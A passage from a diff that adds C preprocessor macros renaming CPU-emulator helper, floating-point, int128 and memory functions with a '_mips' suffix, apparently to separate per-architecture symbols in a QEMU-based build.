helper_iwmmxt_subsw_mips +#define helper_iwmmxt_subub helper_iwmmxt_subub_mips +#define helper_iwmmxt_subul helper_iwmmxt_subul_mips +#define helper_iwmmxt_subuw helper_iwmmxt_subuw_mips +#define helper_iwmmxt_unpackhb helper_iwmmxt_unpackhb_mips +#define helper_iwmmxt_unpackhl helper_iwmmxt_unpackhl_mips +#define helper_iwmmxt_unpackhsb helper_iwmmxt_unpackhsb_mips +#define helper_iwmmxt_unpackhsl helper_iwmmxt_unpackhsl_mips +#define helper_iwmmxt_unpackhsw helper_iwmmxt_unpackhsw_mips +#define helper_iwmmxt_unpackhub helper_iwmmxt_unpackhub_mips +#define helper_iwmmxt_unpackhul helper_iwmmxt_unpackhul_mips +#define helper_iwmmxt_unpackhuw helper_iwmmxt_unpackhuw_mips +#define helper_iwmmxt_unpackhw helper_iwmmxt_unpackhw_mips +#define helper_iwmmxt_unpacklb helper_iwmmxt_unpacklb_mips +#define helper_iwmmxt_unpackll helper_iwmmxt_unpackll_mips +#define helper_iwmmxt_unpacklsb helper_iwmmxt_unpacklsb_mips +#define helper_iwmmxt_unpacklsl helper_iwmmxt_unpacklsl_mips +#define helper_iwmmxt_unpacklsw helper_iwmmxt_unpacklsw_mips +#define helper_iwmmxt_unpacklub helper_iwmmxt_unpacklub_mips +#define helper_iwmmxt_unpacklul helper_iwmmxt_unpacklul_mips +#define helper_iwmmxt_unpackluw helper_iwmmxt_unpackluw_mips +#define helper_iwmmxt_unpacklw helper_iwmmxt_unpacklw_mips +#define helper_ldb_cmmu helper_ldb_cmmu_mips +#define helper_ldb_mmu helper_ldb_mmu_mips +#define helper_ldl_cmmu helper_ldl_cmmu_mips +#define helper_ldl_mmu helper_ldl_mmu_mips +#define helper_ldq_cmmu helper_ldq_cmmu_mips +#define helper_ldq_mmu helper_ldq_mmu_mips +#define helper_ldw_cmmu helper_ldw_cmmu_mips +#define helper_ldw_mmu helper_ldw_mmu_mips +#define helper_le_ldl_cmmu helper_le_ldl_cmmu_mips +#define helper_le_ldq_cmmu helper_le_ldq_cmmu_mips +#define helper_le_ldq_mmu helper_le_ldq_mmu_mips +#define helper_le_ldsl_mmu helper_le_ldsl_mmu_mips +#define helper_le_ldsw_mmu helper_le_ldsw_mmu_mips +#define helper_le_ldul_mmu helper_le_ldul_mmu_mips +#define helper_le_lduw_mmu 
helper_le_lduw_mmu_mips +#define helper_le_ldw_cmmu helper_le_ldw_cmmu_mips +#define helper_le_stl_mmu helper_le_stl_mmu_mips +#define helper_le_stq_mmu helper_le_stq_mmu_mips +#define helper_le_stw_mmu helper_le_stw_mmu_mips +#define helper_msr_i_pstate helper_msr_i_pstate_mips +#define helper_neon_abd_f32 helper_neon_abd_f32_mips +#define helper_neon_abdl_s16 helper_neon_abdl_s16_mips +#define helper_neon_abdl_s32 helper_neon_abdl_s32_mips +#define helper_neon_abdl_s64 helper_neon_abdl_s64_mips +#define helper_neon_abdl_u16 helper_neon_abdl_u16_mips +#define helper_neon_abdl_u32 helper_neon_abdl_u32_mips +#define helper_neon_abdl_u64 helper_neon_abdl_u64_mips +#define helper_neon_abd_s16 helper_neon_abd_s16_mips +#define helper_neon_abd_s32 helper_neon_abd_s32_mips +#define helper_neon_abd_s8 helper_neon_abd_s8_mips +#define helper_neon_abd_u16 helper_neon_abd_u16_mips +#define helper_neon_abd_u32 helper_neon_abd_u32_mips +#define helper_neon_abd_u8 helper_neon_abd_u8_mips +#define helper_neon_abs_s16 helper_neon_abs_s16_mips +#define helper_neon_abs_s8 helper_neon_abs_s8_mips +#define helper_neon_acge_f32 helper_neon_acge_f32_mips +#define helper_neon_acge_f64 helper_neon_acge_f64_mips +#define helper_neon_acgt_f32 helper_neon_acgt_f32_mips +#define helper_neon_acgt_f64 helper_neon_acgt_f64_mips +#define helper_neon_addl_saturate_s32 helper_neon_addl_saturate_s32_mips +#define helper_neon_addl_saturate_s64 helper_neon_addl_saturate_s64_mips +#define helper_neon_addl_u16 helper_neon_addl_u16_mips +#define helper_neon_addl_u32 helper_neon_addl_u32_mips +#define helper_neon_add_u16 helper_neon_add_u16_mips +#define helper_neon_add_u8 helper_neon_add_u8_mips +#define helper_neon_ceq_f32 helper_neon_ceq_f32_mips +#define helper_neon_ceq_u16 helper_neon_ceq_u16_mips +#define helper_neon_ceq_u32 helper_neon_ceq_u32_mips +#define helper_neon_ceq_u8 helper_neon_ceq_u8_mips +#define helper_neon_cge_f32 helper_neon_cge_f32_mips +#define helper_neon_cge_s16 
helper_neon_cge_s16_mips +#define helper_neon_cge_s32 helper_neon_cge_s32_mips +#define helper_neon_cge_s8 helper_neon_cge_s8_mips +#define helper_neon_cge_u16 helper_neon_cge_u16_mips +#define helper_neon_cge_u32 helper_neon_cge_u32_mips +#define helper_neon_cge_u8 helper_neon_cge_u8_mips +#define helper_neon_cgt_f32 helper_neon_cgt_f32_mips +#define helper_neon_cgt_s16 helper_neon_cgt_s16_mips +#define helper_neon_cgt_s32 helper_neon_cgt_s32_mips +#define helper_neon_cgt_s8 helper_neon_cgt_s8_mips +#define helper_neon_cgt_u16 helper_neon_cgt_u16_mips +#define helper_neon_cgt_u32 helper_neon_cgt_u32_mips +#define helper_neon_cgt_u8 helper_neon_cgt_u8_mips +#define helper_neon_cls_s16 helper_neon_cls_s16_mips +#define helper_neon_cls_s32 helper_neon_cls_s32_mips +#define helper_neon_cls_s8 helper_neon_cls_s8_mips +#define helper_neon_clz_u16 helper_neon_clz_u16_mips +#define helper_neon_clz_u8 helper_neon_clz_u8_mips +#define helper_neon_cnt_u8 helper_neon_cnt_u8_mips +#define helper_neon_fcvt_f16_to_f32 helper_neon_fcvt_f16_to_f32_mips +#define helper_neon_fcvt_f32_to_f16 helper_neon_fcvt_f32_to_f16_mips +#define helper_neon_hadd_s16 helper_neon_hadd_s16_mips +#define helper_neon_hadd_s32 helper_neon_hadd_s32_mips +#define helper_neon_hadd_s8 helper_neon_hadd_s8_mips +#define helper_neon_hadd_u16 helper_neon_hadd_u16_mips +#define helper_neon_hadd_u32 helper_neon_hadd_u32_mips +#define helper_neon_hadd_u8 helper_neon_hadd_u8_mips +#define helper_neon_hsub_s16 helper_neon_hsub_s16_mips +#define helper_neon_hsub_s32 helper_neon_hsub_s32_mips +#define helper_neon_hsub_s8 helper_neon_hsub_s8_mips +#define helper_neon_hsub_u16 helper_neon_hsub_u16_mips +#define helper_neon_hsub_u32 helper_neon_hsub_u32_mips +#define helper_neon_hsub_u8 helper_neon_hsub_u8_mips +#define helper_neon_max_s16 helper_neon_max_s16_mips +#define helper_neon_max_s32 helper_neon_max_s32_mips +#define helper_neon_max_s8 helper_neon_max_s8_mips +#define helper_neon_max_u16 
helper_neon_max_u16_mips +#define helper_neon_max_u32 helper_neon_max_u32_mips +#define helper_neon_max_u8 helper_neon_max_u8_mips +#define helper_neon_min_s16 helper_neon_min_s16_mips +#define helper_neon_min_s32 helper_neon_min_s32_mips +#define helper_neon_min_s8 helper_neon_min_s8_mips +#define helper_neon_min_u16 helper_neon_min_u16_mips +#define helper_neon_min_u32 helper_neon_min_u32_mips +#define helper_neon_min_u8 helper_neon_min_u8_mips +#define helper_neon_mull_p8 helper_neon_mull_p8_mips +#define helper_neon_mull_s16 helper_neon_mull_s16_mips +#define helper_neon_mull_s8 helper_neon_mull_s8_mips +#define helper_neon_mull_u16 helper_neon_mull_u16_mips +#define helper_neon_mull_u8 helper_neon_mull_u8_mips +#define helper_neon_mul_p8 helper_neon_mul_p8_mips +#define helper_neon_mul_u16 helper_neon_mul_u16_mips +#define helper_neon_mul_u8 helper_neon_mul_u8_mips +#define helper_neon_narrow_high_u16 helper_neon_narrow_high_u16_mips +#define helper_neon_narrow_high_u8 helper_neon_narrow_high_u8_mips +#define helper_neon_narrow_round_high_u16 helper_neon_narrow_round_high_u16_mips +#define helper_neon_narrow_round_high_u8 helper_neon_narrow_round_high_u8_mips +#define helper_neon_narrow_sat_s16 helper_neon_narrow_sat_s16_mips +#define helper_neon_narrow_sat_s32 helper_neon_narrow_sat_s32_mips +#define helper_neon_narrow_sat_s8 helper_neon_narrow_sat_s8_mips +#define helper_neon_narrow_sat_u16 helper_neon_narrow_sat_u16_mips +#define helper_neon_narrow_sat_u32 helper_neon_narrow_sat_u32_mips +#define helper_neon_narrow_sat_u8 helper_neon_narrow_sat_u8_mips +#define helper_neon_narrow_u16 helper_neon_narrow_u16_mips +#define helper_neon_narrow_u8 helper_neon_narrow_u8_mips +#define helper_neon_negl_u16 helper_neon_negl_u16_mips +#define helper_neon_negl_u32 helper_neon_negl_u32_mips +#define helper_neon_paddl_u16 helper_neon_paddl_u16_mips +#define helper_neon_paddl_u32 helper_neon_paddl_u32_mips +#define helper_neon_padd_u16 helper_neon_padd_u16_mips +#define 
helper_neon_padd_u8 helper_neon_padd_u8_mips +#define helper_neon_pmax_s16 helper_neon_pmax_s16_mips +#define helper_neon_pmax_s8 helper_neon_pmax_s8_mips +#define helper_neon_pmax_u16 helper_neon_pmax_u16_mips +#define helper_neon_pmax_u8 helper_neon_pmax_u8_mips +#define helper_neon_pmin_s16 helper_neon_pmin_s16_mips +#define helper_neon_pmin_s8 helper_neon_pmin_s8_mips +#define helper_neon_pmin_u16 helper_neon_pmin_u16_mips +#define helper_neon_pmin_u8 helper_neon_pmin_u8_mips +#define helper_neon_pmull_64_hi helper_neon_pmull_64_hi_mips +#define helper_neon_pmull_64_lo helper_neon_pmull_64_lo_mips +#define helper_neon_qabs_s16 helper_neon_qabs_s16_mips +#define helper_neon_qabs_s32 helper_neon_qabs_s32_mips +#define helper_neon_qabs_s64 helper_neon_qabs_s64_mips +#define helper_neon_qabs_s8 helper_neon_qabs_s8_mips +#define helper_neon_qadd_s16 helper_neon_qadd_s16_mips +#define helper_neon_qadd_s32 helper_neon_qadd_s32_mips +#define helper_neon_qadd_s64 helper_neon_qadd_s64_mips +#define helper_neon_qadd_s8 helper_neon_qadd_s8_mips +#define helper_neon_qadd_u16 helper_neon_qadd_u16_mips +#define helper_neon_qadd_u32 helper_neon_qadd_u32_mips +#define helper_neon_qadd_u64 helper_neon_qadd_u64_mips +#define helper_neon_qadd_u8 helper_neon_qadd_u8_mips +#define helper_neon_qdmulh_s16 helper_neon_qdmulh_s16_mips +#define helper_neon_qdmulh_s32 helper_neon_qdmulh_s32_mips +#define helper_neon_qneg_s16 helper_neon_qneg_s16_mips +#define helper_neon_qneg_s32 helper_neon_qneg_s32_mips +#define helper_neon_qneg_s64 helper_neon_qneg_s64_mips +#define helper_neon_qneg_s8 helper_neon_qneg_s8_mips +#define helper_neon_qrdmulh_s16 helper_neon_qrdmulh_s16_mips +#define helper_neon_qrdmulh_s32 helper_neon_qrdmulh_s32_mips +#define helper_neon_qrshl_s16 helper_neon_qrshl_s16_mips +#define helper_neon_qrshl_s32 helper_neon_qrshl_s32_mips +#define helper_neon_qrshl_s64 helper_neon_qrshl_s64_mips +#define helper_neon_qrshl_s8 helper_neon_qrshl_s8_mips +#define 
helper_neon_qrshl_u16 helper_neon_qrshl_u16_mips +#define helper_neon_qrshl_u32 helper_neon_qrshl_u32_mips +#define helper_neon_qrshl_u64 helper_neon_qrshl_u64_mips +#define helper_neon_qrshl_u8 helper_neon_qrshl_u8_mips +#define helper_neon_qshl_s16 helper_neon_qshl_s16_mips +#define helper_neon_qshl_s32 helper_neon_qshl_s32_mips +#define helper_neon_qshl_s64 helper_neon_qshl_s64_mips +#define helper_neon_qshl_s8 helper_neon_qshl_s8_mips +#define helper_neon_qshl_u16 helper_neon_qshl_u16_mips +#define helper_neon_qshl_u32 helper_neon_qshl_u32_mips +#define helper_neon_qshl_u64 helper_neon_qshl_u64_mips +#define helper_neon_qshl_u8 helper_neon_qshl_u8_mips +#define helper_neon_qshlu_s16 helper_neon_qshlu_s16_mips +#define helper_neon_qshlu_s32 helper_neon_qshlu_s32_mips +#define helper_neon_qshlu_s64 helper_neon_qshlu_s64_mips +#define helper_neon_qshlu_s8 helper_neon_qshlu_s8_mips +#define helper_neon_qsub_s16 helper_neon_qsub_s16_mips +#define helper_neon_qsub_s32 helper_neon_qsub_s32_mips +#define helper_neon_qsub_s64 helper_neon_qsub_s64_mips +#define helper_neon_qsub_s8 helper_neon_qsub_s8_mips +#define helper_neon_qsub_u16 helper_neon_qsub_u16_mips +#define helper_neon_qsub_u32 helper_neon_qsub_u32_mips +#define helper_neon_qsub_u64 helper_neon_qsub_u64_mips +#define helper_neon_qsub_u8 helper_neon_qsub_u8_mips +#define helper_neon_qunzip16 helper_neon_qunzip16_mips +#define helper_neon_qunzip32 helper_neon_qunzip32_mips +#define helper_neon_qunzip8 helper_neon_qunzip8_mips +#define helper_neon_qzip16 helper_neon_qzip16_mips +#define helper_neon_qzip32 helper_neon_qzip32_mips +#define helper_neon_qzip8 helper_neon_qzip8_mips +#define helper_neon_rbit_u8 helper_neon_rbit_u8_mips +#define helper_neon_rhadd_s16 helper_neon_rhadd_s16_mips +#define helper_neon_rhadd_s32 helper_neon_rhadd_s32_mips +#define helper_neon_rhadd_s8 helper_neon_rhadd_s8_mips +#define helper_neon_rhadd_u16 helper_neon_rhadd_u16_mips +#define helper_neon_rhadd_u32 
helper_neon_rhadd_u32_mips +#define helper_neon_rhadd_u8 helper_neon_rhadd_u8_mips +#define helper_neon_rshl_s16 helper_neon_rshl_s16_mips +#define helper_neon_rshl_s32 helper_neon_rshl_s32_mips +#define helper_neon_rshl_s64 helper_neon_rshl_s64_mips +#define helper_neon_rshl_s8 helper_neon_rshl_s8_mips +#define helper_neon_rshl_u16 helper_neon_rshl_u16_mips +#define helper_neon_rshl_u32 helper_neon_rshl_u32_mips +#define helper_neon_rshl_u64 helper_neon_rshl_u64_mips +#define helper_neon_rshl_u8 helper_neon_rshl_u8_mips +#define helper_neon_shl_s16 helper_neon_shl_s16_mips +#define helper_neon_shl_s32 helper_neon_shl_s32_mips +#define helper_neon_shl_s64 helper_neon_shl_s64_mips +#define helper_neon_shl_s8 helper_neon_shl_s8_mips +#define helper_neon_shl_u16 helper_neon_shl_u16_mips +#define helper_neon_shl_u32 helper_neon_shl_u32_mips +#define helper_neon_shl_u64 helper_neon_shl_u64_mips +#define helper_neon_shl_u8 helper_neon_shl_u8_mips +#define helper_neon_sqadd_u16 helper_neon_sqadd_u16_mips +#define helper_neon_sqadd_u32 helper_neon_sqadd_u32_mips +#define helper_neon_sqadd_u64 helper_neon_sqadd_u64_mips +#define helper_neon_sqadd_u8 helper_neon_sqadd_u8_mips +#define helper_neon_subl_u16 helper_neon_subl_u16_mips +#define helper_neon_subl_u32 helper_neon_subl_u32_mips +#define helper_neon_sub_u16 helper_neon_sub_u16_mips +#define helper_neon_sub_u8 helper_neon_sub_u8_mips +#define helper_neon_tbl helper_neon_tbl_mips +#define helper_neon_tst_u16 helper_neon_tst_u16_mips +#define helper_neon_tst_u32 helper_neon_tst_u32_mips +#define helper_neon_tst_u8 helper_neon_tst_u8_mips +#define helper_neon_unarrow_sat16 helper_neon_unarrow_sat16_mips +#define helper_neon_unarrow_sat32 helper_neon_unarrow_sat32_mips +#define helper_neon_unarrow_sat8 helper_neon_unarrow_sat8_mips +#define helper_neon_unzip16 helper_neon_unzip16_mips +#define helper_neon_unzip8 helper_neon_unzip8_mips +#define helper_neon_uqadd_s16 helper_neon_uqadd_s16_mips +#define helper_neon_uqadd_s32 
helper_neon_uqadd_s32_mips +#define helper_neon_uqadd_s64 helper_neon_uqadd_s64_mips +#define helper_neon_uqadd_s8 helper_neon_uqadd_s8_mips +#define helper_neon_widen_s16 helper_neon_widen_s16_mips +#define helper_neon_widen_s8 helper_neon_widen_s8_mips +#define helper_neon_widen_u16 helper_neon_widen_u16_mips +#define helper_neon_widen_u8 helper_neon_widen_u8_mips +#define helper_neon_zip16 helper_neon_zip16_mips +#define helper_neon_zip8 helper_neon_zip8_mips +#define helper_pre_hvc helper_pre_hvc_mips +#define helper_pre_smc helper_pre_smc_mips +#define helper_qadd16 helper_qadd16_mips +#define helper_qadd8 helper_qadd8_mips +#define helper_qaddsubx helper_qaddsubx_mips +#define helper_qsub16 helper_qsub16_mips +#define helper_qsub8 helper_qsub8_mips +#define helper_qsubaddx helper_qsubaddx_mips +#define helper_rbit helper_rbit_mips +#define helper_recpe_f32 helper_recpe_f32_mips +#define helper_recpe_f64 helper_recpe_f64_mips +#define helper_recpe_u32 helper_recpe_u32_mips +#define helper_recps_f32 helper_recps_f32_mips +#define helper_ret_ldb_cmmu helper_ret_ldb_cmmu_mips +#define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_mips +#define helper_ret_ldub_mmu helper_ret_ldub_mmu_mips +#define helper_ret_stb_mmu helper_ret_stb_mmu_mips +#define helper_rintd helper_rintd_mips +#define helper_rintd_exact helper_rintd_exact_mips +#define helper_rints helper_rints_mips +#define helper_rints_exact helper_rints_exact_mips +#define helper_ror_cc helper_ror_cc_mips +#define helper_rsqrte_f32 helper_rsqrte_f32_mips +#define helper_rsqrte_f64 helper_rsqrte_f64_mips +#define helper_rsqrte_u32 helper_rsqrte_u32_mips +#define helper_rsqrts_f32 helper_rsqrts_f32_mips +#define helper_sadd16 helper_sadd16_mips +#define helper_sadd8 helper_sadd8_mips +#define helper_saddsubx helper_saddsubx_mips +#define helper_sar_cc helper_sar_cc_mips +#define helper_sdiv helper_sdiv_mips +#define helper_sel_flags helper_sel_flags_mips +#define helper_set_cp_reg helper_set_cp_reg_mips +#define 
helper_set_cp_reg64 helper_set_cp_reg64_mips +#define helper_set_neon_rmode helper_set_neon_rmode_mips +#define helper_set_r13_banked helper_set_r13_banked_mips +#define helper_set_rmode helper_set_rmode_mips +#define helper_set_user_reg helper_set_user_reg_mips +#define helper_shadd16 helper_shadd16_mips +#define helper_shadd8 helper_shadd8_mips +#define helper_shaddsubx helper_shaddsubx_mips +#define helper_shl_cc helper_shl_cc_mips +#define helper_shr_cc helper_shr_cc_mips +#define helper_shsub16 helper_shsub16_mips +#define helper_shsub8 helper_shsub8_mips +#define helper_shsubaddx helper_shsubaddx_mips +#define helper_ssat helper_ssat_mips +#define helper_ssat16 helper_ssat16_mips +#define helper_ssub16 helper_ssub16_mips +#define helper_ssub8 helper_ssub8_mips +#define helper_ssubaddx helper_ssubaddx_mips +#define helper_stb_mmu helper_stb_mmu_mips +#define helper_stl_mmu helper_stl_mmu_mips +#define helper_stq_mmu helper_stq_mmu_mips +#define helper_stw_mmu helper_stw_mmu_mips +#define helper_sub_saturate helper_sub_saturate_mips +#define helper_sub_usaturate helper_sub_usaturate_mips +#define helper_sxtb16 helper_sxtb16_mips +#define helper_uadd16 helper_uadd16_mips +#define helper_uadd8 helper_uadd8_mips +#define helper_uaddsubx helper_uaddsubx_mips +#define helper_udiv helper_udiv_mips +#define helper_uhadd16 helper_uhadd16_mips +#define helper_uhadd8 helper_uhadd8_mips +#define helper_uhaddsubx helper_uhaddsubx_mips +#define helper_uhsub16 helper_uhsub16_mips +#define helper_uhsub8 helper_uhsub8_mips +#define helper_uhsubaddx helper_uhsubaddx_mips +#define helper_uqadd16 helper_uqadd16_mips +#define helper_uqadd8 helper_uqadd8_mips +#define helper_uqaddsubx helper_uqaddsubx_mips +#define helper_uqsub16 helper_uqsub16_mips +#define helper_uqsub8 helper_uqsub8_mips +#define helper_uqsubaddx helper_uqsubaddx_mips +#define helper_usad8 helper_usad8_mips +#define helper_usat helper_usat_mips +#define helper_usat16 helper_usat16_mips +#define helper_usub16 
helper_usub16_mips +#define helper_usub8 helper_usub8_mips +#define helper_usubaddx helper_usubaddx_mips +#define helper_uxtb16 helper_uxtb16_mips +#define helper_v7m_mrs helper_v7m_mrs_mips +#define helper_v7m_msr helper_v7m_msr_mips +#define helper_vfp_absd helper_vfp_absd_mips +#define helper_vfp_abss helper_vfp_abss_mips +#define helper_vfp_addd helper_vfp_addd_mips +#define helper_vfp_adds helper_vfp_adds_mips +#define helper_vfp_cmpd helper_vfp_cmpd_mips +#define helper_vfp_cmped helper_vfp_cmped_mips +#define helper_vfp_cmpes helper_vfp_cmpes_mips +#define helper_vfp_cmps helper_vfp_cmps_mips +#define helper_vfp_divd helper_vfp_divd_mips +#define helper_vfp_divs helper_vfp_divs_mips +#define helper_vfp_fcvtds helper_vfp_fcvtds_mips +#define helper_vfp_fcvt_f16_to_f32 helper_vfp_fcvt_f16_to_f32_mips +#define helper_vfp_fcvt_f16_to_f64 helper_vfp_fcvt_f16_to_f64_mips +#define helper_vfp_fcvt_f32_to_f16 helper_vfp_fcvt_f32_to_f16_mips +#define helper_vfp_fcvt_f64_to_f16 helper_vfp_fcvt_f64_to_f16_mips +#define helper_vfp_fcvtsd helper_vfp_fcvtsd_mips +#define helper_vfp_get_fpscr helper_vfp_get_fpscr_mips +#define helper_vfp_maxd helper_vfp_maxd_mips +#define helper_vfp_maxnumd helper_vfp_maxnumd_mips +#define helper_vfp_maxnums helper_vfp_maxnums_mips +#define helper_vfp_maxs helper_vfp_maxs_mips +#define helper_vfp_mind helper_vfp_mind_mips +#define helper_vfp_minnumd helper_vfp_minnumd_mips +#define helper_vfp_minnums helper_vfp_minnums_mips +#define helper_vfp_mins helper_vfp_mins_mips +#define helper_vfp_muladdd helper_vfp_muladdd_mips +#define helper_vfp_muladds helper_vfp_muladds_mips +#define helper_vfp_muld helper_vfp_muld_mips +#define helper_vfp_muls helper_vfp_muls_mips +#define helper_vfp_negd helper_vfp_negd_mips +#define helper_vfp_negs helper_vfp_negs_mips +#define helper_vfp_set_fpscr helper_vfp_set_fpscr_mips +#define helper_vfp_shtod helper_vfp_shtod_mips +#define helper_vfp_shtos helper_vfp_shtos_mips +#define helper_vfp_sitod 
helper_vfp_sitod_mips +#define helper_vfp_sitos helper_vfp_sitos_mips +#define helper_vfp_sltod helper_vfp_sltod_mips +#define helper_vfp_sltos helper_vfp_sltos_mips +#define helper_vfp_sqrtd helper_vfp_sqrtd_mips +#define helper_vfp_sqrts helper_vfp_sqrts_mips +#define helper_vfp_sqtod helper_vfp_sqtod_mips +#define helper_vfp_sqtos helper_vfp_sqtos_mips +#define helper_vfp_subd helper_vfp_subd_mips +#define helper_vfp_subs helper_vfp_subs_mips +#define helper_vfp_toshd helper_vfp_toshd_mips +#define helper_vfp_toshd_round_to_zero helper_vfp_toshd_round_to_zero_mips +#define helper_vfp_toshs helper_vfp_toshs_mips +#define helper_vfp_toshs_round_to_zero helper_vfp_toshs_round_to_zero_mips +#define helper_vfp_tosid helper_vfp_tosid_mips +#define helper_vfp_tosis helper_vfp_tosis_mips +#define helper_vfp_tosizd helper_vfp_tosizd_mips +#define helper_vfp_tosizs helper_vfp_tosizs_mips +#define helper_vfp_tosld helper_vfp_tosld_mips +#define helper_vfp_tosld_round_to_zero helper_vfp_tosld_round_to_zero_mips +#define helper_vfp_tosls helper_vfp_tosls_mips +#define helper_vfp_tosls_round_to_zero helper_vfp_tosls_round_to_zero_mips +#define helper_vfp_tosqd helper_vfp_tosqd_mips +#define helper_vfp_tosqs helper_vfp_tosqs_mips +#define helper_vfp_touhd helper_vfp_touhd_mips +#define helper_vfp_touhd_round_to_zero helper_vfp_touhd_round_to_zero_mips +#define helper_vfp_touhs helper_vfp_touhs_mips +#define helper_vfp_touhs_round_to_zero helper_vfp_touhs_round_to_zero_mips +#define helper_vfp_touid helper_vfp_touid_mips +#define helper_vfp_touis helper_vfp_touis_mips +#define helper_vfp_touizd helper_vfp_touizd_mips +#define helper_vfp_touizs helper_vfp_touizs_mips +#define helper_vfp_tould helper_vfp_tould_mips +#define helper_vfp_tould_round_to_zero helper_vfp_tould_round_to_zero_mips +#define helper_vfp_touls helper_vfp_touls_mips +#define helper_vfp_touls_round_to_zero helper_vfp_touls_round_to_zero_mips +#define helper_vfp_touqd helper_vfp_touqd_mips +#define 
helper_vfp_touqs helper_vfp_touqs_mips +#define helper_vfp_uhtod helper_vfp_uhtod_mips +#define helper_vfp_uhtos helper_vfp_uhtos_mips +#define helper_vfp_uitod helper_vfp_uitod_mips +#define helper_vfp_uitos helper_vfp_uitos_mips +#define helper_vfp_ultod helper_vfp_ultod_mips +#define helper_vfp_ultos helper_vfp_ultos_mips +#define helper_vfp_uqtod helper_vfp_uqtod_mips +#define helper_vfp_uqtos helper_vfp_uqtos_mips +#define helper_wfe helper_wfe_mips +#define helper_wfi helper_wfi_mips +#define hex2decimal hex2decimal_mips +#define hw_breakpoint_update hw_breakpoint_update_mips +#define hw_breakpoint_update_all hw_breakpoint_update_all_mips +#define hw_watchpoint_update hw_watchpoint_update_mips +#define hw_watchpoint_update_all hw_watchpoint_update_all_mips +#define _init _init_mips +#define init_cpreg_list init_cpreg_list_mips +#define init_lists init_lists_mips +#define input_type_enum input_type_enum_mips +#define int128_2_64 int128_2_64_mips +#define int128_add int128_add_mips +#define int128_addto int128_addto_mips +#define int128_and int128_and_mips +#define int128_eq int128_eq_mips +#define int128_ge int128_ge_mips +#define int128_get64 int128_get64_mips +#define int128_gt int128_gt_mips +#define int128_le int128_le_mips +#define int128_lt int128_lt_mips +#define int128_make64 int128_make64_mips +#define int128_max int128_max_mips +#define int128_min int128_min_mips +#define int128_ne int128_ne_mips +#define int128_neg int128_neg_mips +#define int128_nz int128_nz_mips +#define int128_rshift int128_rshift_mips +#define int128_sub int128_sub_mips +#define int128_subfrom int128_subfrom_mips +#define int128_zero int128_zero_mips +#define int16_to_float32 int16_to_float32_mips +#define int16_to_float64 int16_to_float64_mips +#define int32_to_float128 int32_to_float128_mips +#define int32_to_float32 int32_to_float32_mips +#define int32_to_float64 int32_to_float64_mips +#define int32_to_floatx80 int32_to_floatx80_mips +#define int64_to_float128 
int64_to_float128_mips +#define int64_to_float32 int64_to_float32_mips +#define int64_to_float64 int64_to_float64_mips +#define int64_to_floatx80 int64_to_floatx80_mips +#define invalidate_and_set_dirty invalidate_and_set_dirty_mips +#define invalidate_page_bitmap invalidate_page_bitmap_mips +#define io_mem_read io_mem_read_mips +#define io_mem_write io_mem_write_mips +#define io_readb io_readb_mips +#define io_readl io_readl_mips +#define io_readq io_readq_mips +#define io_readw io_readw_mips +#define iotlb_to_region iotlb_to_region_mips +#define io_writeb io_writeb_mips +#define io_writel io_writel_mips +#define io_writeq io_writeq_mips +#define io_writew io_writew_mips +#define is_a64 is_a64_mips +#define is_help_option is_help_option_mips +#define isr_read isr_read_mips +#define is_valid_option_list is_valid_option_list_mips +#define iwmmxt_load_creg iwmmxt_load_creg_mips +#define iwmmxt_load_reg iwmmxt_load_reg_mips +#define iwmmxt_store_creg iwmmxt_store_creg_mips +#define iwmmxt_store_reg iwmmxt_store_reg_mips +#define __jit_debug_descriptor __jit_debug_descriptor_mips +#define __jit_debug_register_code __jit_debug_register_code_mips +#define kvm_to_cpreg_id kvm_to_cpreg_id_mips +#define last_ram_offset last_ram_offset_mips +#define ldl_be_p ldl_be_p_mips +#define ldl_be_phys ldl_be_phys_mips +#define ldl_he_p ldl_he_p_mips +#define ldl_le_p ldl_le_p_mips +#define ldl_le_phys ldl_le_phys_mips +#define ldl_phys ldl_phys_mips +#define ldl_phys_internal ldl_phys_internal_mips +#define ldq_be_p ldq_be_p_mips +#define ldq_be_phys ldq_be_phys_mips +#define ldq_he_p ldq_he_p_mips +#define ldq_le_p ldq_le_p_mips +#define ldq_le_phys ldq_le_phys_mips +#define ldq_phys ldq_phys_mips +#define ldq_phys_internal ldq_phys_internal_mips +#define ldst_name ldst_name_mips +#define ldub_p ldub_p_mips +#define ldub_phys ldub_phys_mips +#define lduw_be_p lduw_be_p_mips +#define lduw_be_phys lduw_be_phys_mips +#define lduw_he_p lduw_he_p_mips +#define lduw_le_p lduw_le_p_mips 
+#define lduw_le_phys lduw_le_phys_mips +#define lduw_phys lduw_phys_mips +#define lduw_phys_internal lduw_phys_internal_mips +#define le128 le128_mips +#define linked_bp_matches linked_bp_matches_mips +#define listener_add_address_space listener_add_address_space_mips +#define load_cpu_offset load_cpu_offset_mips +#define load_reg load_reg_mips +#define load_reg_var load_reg_var_mips +#define log_cpu_state log_cpu_state_mips +#define lpae_cp_reginfo lpae_cp_reginfo_mips +#define lt128 lt128_mips +#define machine_class_init machine_class_init_mips +#define machine_finalize machine_finalize_mips +#define machine_info machine_info_mips +#define machine_initfn machine_initfn_mips +#define machine_register_types machine_register_types_mips +#define machvirt_init machvirt_init_mips +#define machvirt_machine_init machvirt_machine_init_mips +#define maj maj_mips +#define mapping_conflict mapping_conflict_mips +#define mapping_contiguous mapping_contiguous_mips +#define mapping_have_same_region mapping_have_same_region_mips +#define mapping_merge mapping_merge_mips +#define mem_add mem_add_mips +#define mem_begin mem_begin_mips +#define mem_commit mem_commit_mips +#define memory_access_is_direct memory_access_is_direct_mips +#define memory_access_size memory_access_size_mips +#define memory_init memory_init_mips +#define memory_listener_match memory_listener_match_mips +#define memory_listener_register memory_listener_register_mips +#define memory_listener_unregister memory_listener_unregister_mips +#define memory_map_init memory_map_init_mips +#define memory_mapping_filter memory_mapping_filter_mips +#define memory_mapping_list_add_mapping_sorted memory_mapping_list_add_mapping_sorted_mips +#define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_mips +#define memory_mapping_list_free memory_mapping_list_free_mips +#define memory_mapping_list_init memory_mapping_list_init_mips +#define memory_region_access_valid memory_region_access_valid_mips 
